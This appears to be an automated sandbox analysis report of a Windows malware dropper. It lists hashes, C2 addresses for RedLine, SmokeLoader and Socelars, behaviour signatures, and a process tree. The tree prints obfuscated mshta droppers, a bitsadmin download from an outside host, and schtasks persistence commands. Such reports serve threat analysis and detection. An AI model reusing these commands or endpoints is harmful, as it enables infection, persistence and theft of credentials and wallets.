Resubmissions

10-11-2021 14:52

211110-r84p8ahcb5 10

10-11-2021 14:46

211110-r5g22seddm 10

10-11-2021 14:39

211110-r1a3yaedcq 6

10-11-2021 14:22

211110-rptqxahbf9 10

Analysis

  • max time kernel
    607s
  • max time network
    616s
  • platform
    windows10_x64
  • resource
    win10-ja-20211014
  • submitted
    10-11-2021 14:52

General

  • Target

    022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

  • Size

    403KB

  • MD5

    f957e397e71010885b67f2afe37d8161

  • SHA1

    a8bf84b971b37ac6e7f66c5e5a7e971a7741401e

  • SHA256

    022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66

  • SHA512

    8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6

Malware Config

Extracted

Family

socelars

C2

http://www.hhgenice.top/

Extracted

Family

redline

C2

tatreriash.xyz:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://misha.at/upload/

http://roohaniinfra.com/upload/

http://0axqpcc.cn/upload/

http://mayak-lombard.ru/upload/

http://mebel-lass.ru/upload/

http://dishakhan.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1011h

C2

charirelay.xyz:80

Extracted

Family

redline

Botnet

udptest

C2

193.56.146.64:65441

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Blocklisted process makes network request 51 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • VMProtect packed file 5 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 26 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 40 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2804
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2644
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2448
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2412
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1852
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1372
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1352
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1192
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1108
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1040
                        • C:\Users\Admin\AppData\Roaming\egjibaa
                          C:\Users\Admin\AppData\Roaming\egjibaa
                          2⤵
                            PID:5104
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:316
                          • C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
                            "C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
                            1⤵
                            • Checks computer location settings
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:1136
                            • C:\Users\Admin\Pictures\Adobe Films\JgJmxlpluHFebx9JsIXZoeRE.exe
                              "C:\Users\Admin\Pictures\Adobe Films\JgJmxlpluHFebx9JsIXZoeRE.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2864
                            • C:\Users\Admin\Pictures\Adobe Films\6woJgaUWP3hVz76U5xXDbeRP.exe
                              "C:\Users\Admin\Pictures\Adobe Films\6woJgaUWP3hVz76U5xXDbeRP.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1184
                            • C:\Users\Admin\Pictures\Adobe Films\PIVlje9ttWxiQXTvTFfhS_1O.exe
                              "C:\Users\Admin\Pictures\Adobe Films\PIVlje9ttWxiQXTvTFfhS_1O.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2120
                              • C:\Users\Admin\Pictures\Adobe Films\PIVlje9ttWxiQXTvTFfhS_1O.exe
                                "C:\Users\Admin\Pictures\Adobe Films\PIVlje9ttWxiQXTvTFfhS_1O.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:5800
                            • C:\Users\Admin\Pictures\Adobe Films\Yr75gyCFywUqnUTgvzruoxhU.exe
                              "C:\Users\Admin\Pictures\Adobe Films\Yr75gyCFywUqnUTgvzruoxhU.exe"
                              2⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1568
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c taskkill /f /im chrome.exe
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                PID:1548
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im chrome.exe
                                  4⤵
                                  • Kills process with taskkill
                                  PID:6912
                            • C:\Users\Admin\Pictures\Adobe Films\k8VjlIWFDnkKPQeJq3wo2Lun.exe
                              "C:\Users\Admin\Pictures\Adobe Films\k8VjlIWFDnkKPQeJq3wo2Lun.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              PID:2132
                            • C:\Users\Admin\Pictures\Adobe Films\HdJq6R9vj5v1SpI6pizuurdq.exe
                              "C:\Users\Admin\Pictures\Adobe Films\HdJq6R9vj5v1SpI6pizuurdq.exe"
                              2⤵
                                PID:1916
                              • C:\Users\Admin\Pictures\Adobe Films\i6FZyLoXNG0nFQHL3VhZ_lC0.exe
                                "C:\Users\Admin\Pictures\Adobe Films\i6FZyLoXNG0nFQHL3VhZ_lC0.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:2284
                              • C:\Users\Admin\Pictures\Adobe Films\wW9ZeiTml9ow95zG2gwnZilV.exe
                                "C:\Users\Admin\Pictures\Adobe Films\wW9ZeiTml9ow95zG2gwnZilV.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1920
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 896
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  PID:6112
                              • C:\Users\Admin\Pictures\Adobe Films\3oOf06ASk5vUBY6DlBnMub7s.exe
                                "C:\Users\Admin\Pictures\Adobe Films\3oOf06ASk5vUBY6DlBnMub7s.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2064
                                • C:\Users\Admin\Documents\obl4i01RP4ZqDt8X4wDq1wsy.exe
                                  "C:\Users\Admin\Documents\obl4i01RP4ZqDt8X4wDq1wsy.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  PID:5532
                                  • C:\Users\Admin\Pictures\Adobe Films\kCuwheOXuE9LsJIhfwzoyaBJ.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\kCuwheOXuE9LsJIhfwzoyaBJ.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4448
                                  • C:\Users\Admin\Pictures\Adobe Films\9p3aSK9DUrdHoBdEPoDx5wDn.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\9p3aSK9DUrdHoBdEPoDx5wDn.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4964
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 664
                                      5⤵
                                      • Program crash
                                      PID:1092
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 676
                                      5⤵
                                      • Program crash
                                      PID:5240
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 680
                                      5⤵
                                      • Program crash
                                      PID:7100
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 736
                                      5⤵
                                      • Program crash
                                      PID:5132
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 1120
                                      5⤵
                                      • Program crash
                                      PID:5132
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 1076
                                      5⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:2436
                                  • C:\Users\Admin\Pictures\Adobe Films\H72X7k9iPnqxWf6eMdSpYFf4.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\H72X7k9iPnqxWf6eMdSpYFf4.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4500
                                  • C:\Users\Admin\Pictures\Adobe Films\BHBub9Q0WzpBwVV82xHtv8VM.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\BHBub9Q0WzpBwVV82xHtv8VM.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:1508
                                  • C:\Users\Admin\Pictures\Adobe Films\FlHTi08XysfqAesxf7_N35cr.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\FlHTi08XysfqAesxf7_N35cr.exe"
                                    4⤵
                                      PID:3356
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\FlHTi08XysfqAesxf7_N35cr.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\FlHTi08XysfqAesxf7_N35cr.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3908
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\FlHTi08XysfqAesxf7_N35cr.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\FlHTi08XysfqAesxf7_N35cr.exe" ) do taskkill -f -iM "%~NxM"
                                          6⤵
                                            PID:1424
                                            • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                              ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                              7⤵
                                              • Executes dropped EXE
                                              • Checks whether UAC is enabled
                                              PID:2080
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                8⤵
                                                • Checks whether UAC is enabled
                                                • Modifies Internet Explorer settings
                                                PID:4112
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                  9⤵
                                                    PID:5888
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                  8⤵
                                                  • Checks whether UAC is enabled
                                                  PID:6376
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                    9⤵
                                                      PID:4812
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                        10⤵
                                                          PID:4104
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                          10⤵
                                                            PID:3744
                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                            msiexec -Y ..\lXQ2g.WC
                                                            10⤵
                                                            • Loads dropped DLL
                                                            PID:5740
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill -f -iM "FlHTi08XysfqAesxf7_N35cr.exe"
                                                      7⤵
                                                      • Kills process with taskkill
                                                      PID:3876
                                              • C:\Users\Admin\Pictures\Adobe Films\M2hWQwsKE6fbEytm41LnS9nu.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\M2hWQwsKE6fbEytm41LnS9nu.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5780
                                              • C:\Users\Admin\Pictures\Adobe Films\UvyzQHuT_PYVlMBbGfEX2WyI.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\UvyzQHuT_PYVlMBbGfEX2WyI.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                PID:6104
                                              • C:\Users\Admin\Pictures\Adobe Films\pO2Zpz8ha8fk9BDQhSVW278N.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\pO2Zpz8ha8fk9BDQhSVW278N.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5100
                                                • C:\Users\Admin\Pictures\Adobe Films\pO2Zpz8ha8fk9BDQhSVW278N.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\pO2Zpz8ha8fk9BDQhSVW278N.exe" -u
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:3608
                                              • C:\Users\Admin\Pictures\Adobe Films\A4Antietc5UNuH52WlpYTMfI.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\A4Antietc5UNuH52WlpYTMfI.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:5672
                                              • C:\Users\Admin\Pictures\Adobe Films\Qyk0rIOmpMiLW3bOouU1NTnx.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\Qyk0rIOmpMiLW3bOouU1NTnx.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:1060
                                                • C:\Users\Admin\AppData\Local\Temp\is-IC8GN.tmp\Qyk0rIOmpMiLW3bOouU1NTnx.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-IC8GN.tmp\Qyk0rIOmpMiLW3bOouU1NTnx.tmp" /SL5="$202FE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Qyk0rIOmpMiLW3bOouU1NTnx.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Checks whether UAC is enabled
                                                  PID:6868
                                                  • C:\Users\Admin\AppData\Local\Temp\is-40M5C.tmp\DYbALA.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-40M5C.tmp\DYbALA.exe" /S /UID=2709
                                                    6⤵
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    PID:2096
                                                    • C:\Users\Admin\AppData\Local\Temp\41-78fe2-ec0-055ac-16efba38f5e3a\Fudogelyjo.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\41-78fe2-ec0-055ac-16efba38f5e3a\Fudogelyjo.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1996
                                                    • C:\Users\Admin\AppData\Local\Temp\6e-a2c36-ef2-b7ebf-6d320fdab17b2\Kufemaejoca.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\6e-a2c36-ef2-b7ebf-6d320fdab17b2\Kufemaejoca.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4664
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwb1t0fy.1vp\GcleanerEU.exe /eufive & exit
                                                        8⤵
                                                        • Blocklisted process makes network request
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2288
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3kg1lpam.c05\installer.exe /qn CAMPAIGN="654" & exit
                                                        8⤵
                                                          PID:3980
                                                          • C:\Users\Admin\AppData\Local\Temp\3kg1lpam.c05\installer.exe
                                                            C:\Users\Admin\AppData\Local\Temp\3kg1lpam.c05\installer.exe /qn CAMPAIGN="654"
                                                            9⤵
                                                            • Loads dropped DLL
                                                            • Enumerates connected drives
                                                            • Modifies system certificate store
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:4256
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3kg1lpam.c05\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\3kg1lpam.c05\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636296619 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                              10⤵
                                                                PID:7544
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l1apdxof.fgc\any.exe & exit
                                                            8⤵
                                                            • Blocklisted process makes network request
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:4852
                                                            • C:\Users\Admin\AppData\Local\Temp\l1apdxof.fgc\any.exe
                                                              C:\Users\Admin\AppData\Local\Temp\l1apdxof.fgc\any.exe
                                                              9⤵
                                                                PID:6628
                                                                • C:\Users\Admin\AppData\Local\Temp\l1apdxof.fgc\any.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\l1apdxof.fgc\any.exe" -u
                                                                  10⤵
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  PID:3356
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lleuxfit.2mi\gcleaner.exe /mixfive & exit
                                                              8⤵
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5976
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gkzmxpuy.4vj\autosubplayer.exe /S & exit
                                                              8⤵
                                                                PID:3900
                                                                • C:\Users\Admin\AppData\Local\Temp\gkzmxpuy.4vj\autosubplayer.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\gkzmxpuy.4vj\autosubplayer.exe /S
                                                                  9⤵
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  PID:4828
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA6D9.tmp\tempfile.ps1"
                                                                    10⤵
                                                                      PID:7176
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA6D9.tmp\tempfile.ps1"
                                                                      10⤵
                                                                        PID:7984
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA6D9.tmp\tempfile.ps1"
                                                                        10⤵
                                                                          PID:7448
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA6D9.tmp\tempfile.ps1"
                                                                          10⤵
                                                                            PID:584
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA6D9.tmp\tempfile.ps1"
                                                                            10⤵
                                                                              PID:964
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA6D9.tmp\tempfile.ps1"
                                                                              10⤵
                                                                                PID:7872
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA6D9.tmp\tempfile.ps1"
                                                                                10⤵
                                                                                • Checks for any installed AV software in registry
                                                                                PID:4800
                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                10⤵
                                                                                • Download via BitsAdmin
                                                                                PID:5616
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  11⤵
                                                                                    PID:5840
                                                                          • C:\Program Files\Reference Assemblies\ELEERSKPKE\foldershare.exe
                                                                            "C:\Program Files\Reference Assemblies\ELEERSKPKE\foldershare.exe" /VERYSILENT
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Checks whether UAC is enabled
                                                                            PID:5684
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                    3⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:5428
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                    3⤵
                                                                    • Creates scheduled task(s)
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4436
                                                                • C:\Users\Admin\Pictures\Adobe Films\L5vwYNRbkqj0k9mqE8auaoV2.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\L5vwYNRbkqj0k9mqE8auaoV2.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  • Drops file in Program Files directory
                                                                  PID:2220
                                                                  • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:3892
                                                                • C:\Users\Admin\Pictures\Adobe Films\5Kfmq5SX98FJlGiyyAjtYbI5.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\5Kfmq5SX98FJlGiyyAjtYbI5.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3836
                                                                • C:\Users\Admin\Pictures\Adobe Films\UohpXmnLnNwOSA2bkA1HO1Xt.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\UohpXmnLnNwOSA2bkA1HO1Xt.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:1564
                                                                • C:\Users\Admin\Pictures\Adobe Films\KXfUSA9GZGVcpkY46d2WhUF3.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\KXfUSA9GZGVcpkY46d2WhUF3.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
